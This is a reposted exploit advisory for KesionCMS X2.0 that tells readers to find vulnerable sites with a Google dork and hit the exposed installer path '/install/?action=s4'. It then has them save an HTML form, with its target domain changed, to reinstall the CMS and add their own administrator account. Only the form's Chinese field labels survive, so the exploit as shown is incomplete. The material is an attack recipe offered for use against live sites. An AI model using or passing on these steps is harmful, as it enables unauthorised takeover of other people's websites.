Published on June 12th, 2023 📆 | 7888 Views ⚑
0Kesion CMS X 2.0 Add Administrator – Torchsec
| # Title : KesionCMS X2.0 Reinstall Add Admin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) |
| # Vendor : https://www.kesion.com/ |
| # Dork : Powered by KesionCMS |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : /install/index.asp
[+] http://127.0.0.1.com/install/?action=s4 = add your information to login
[+] copy & past this exploit listed below into a text file and save it with ".html" extension
[+] Exploit :
[+] @t Line 09 & 16 change the domain name of target
Hacked By indoushka
网站参数配置
- 网站名称:* 如:Kesion官方站
- 网站域名:* 后面不要带“/”。
如http://www.kesion.com。 - 安装目录:* 后面不要带“/”。
系统会自动获取,建议不要修改。 - 授 权 码:
免费版本用户请留空或填“0”。 - 后台目录:* 如:Manage,Admin,后面必须带"/"符号。
- 后台登录验证码:
启用
不启用 - 管理认证码:
启用 不启用
认证码:
填写管理员信息
- 管理员账号:*
- 管理员密码:* 管理员密码不能为空
- 重复密码:
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================
Gloss